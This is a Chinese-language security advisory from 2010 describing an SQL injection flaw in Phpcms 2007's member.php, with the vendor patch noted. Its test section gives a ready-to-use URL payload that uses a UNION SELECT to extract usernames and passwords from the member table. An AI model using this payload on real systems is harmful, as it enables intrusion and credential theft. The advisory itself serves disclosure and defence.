发布日期：2010-06-29
更新日期：2010-06-30

受影响系统：

酷6网 Phpcms 2007

描述：

---

Phpcms网站管理系统是国内主流CMS系统之一。

在Phpcms的member/member.php的第4行：

   1. ..............  
   2. $m = $db->get_one( SELECT * FROM .TABLE_MEMBER. m , .TABLE_MEMBER_INFO. i WHERE m.userid=i.userid AND m.username=
   3. $username
   4.   , CACHE ,86400);  
   5. ..............  

username变量未经过滤就进入查询了，这可能导致SQL注入攻击。

<*来源：寂寞hacker
  
  链接：http://hi.baidu.com/isbx/blog/item/b8370b46cd98f5046a63e5f5.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://ssvdb.com/phpcms/member/member.php?username=luoye%cf union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1/

建议：

---

厂商补丁：

酷6网
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.phpcms.cn/

浏览次数：4247
严重程度：0（网友投票）